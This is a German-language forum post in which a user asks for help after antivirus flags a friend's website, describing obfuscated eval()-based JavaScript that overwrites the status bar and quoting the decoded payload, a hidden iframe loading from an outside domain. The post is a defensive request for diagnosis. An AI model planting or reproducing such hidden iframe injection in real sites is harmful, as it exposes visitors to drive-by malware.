Hi,

hatte grad n Anruf von einem Bekannten, daß ein Virus auf seiner Webseite sei.

Hab nachgeschaut und der Antivir hat folgenden Virus gemeldet:

HTML/Crypted.Gen

Der Virus wird aber nicht immer gemeldet, sondern nur manchmal.

Im Quelltext hab ich dann einen Javascriptblock gefunden, in dem mittels eines Arrays, einer kryptischen Zeichenfolge und versch. Umwandlungen Javascript-Code in einen String gelegt wird, der dann mit eval() ausgeführt wird:

Zuerst wird die Statuszeile mit window.status='Done'; überschrieben, dann wird mit document.write() ein I-Frame ins Dokument eingefügt, natürlich mit style="display:none"

Der an document.write() übergebene Block lautet folgendermaßen:

'<iframe name=cee5f src="http://add-block-filter.net/t/?'+Math.round(Math.random()*18060)+'cee5f'+'" width=172 height=105 style="display:none"></iframe>'

Hab mal "add-block-filter.net" in Google eingegeben, finde aber nichts, was weiterhilft. Ergebnisliste äußerst spärlich.

Offenbar ist wohl der Webspace meines Bekannten gehackt worden.

Kann jemand genaueres oder mehr dazu sagen?

grüße
peter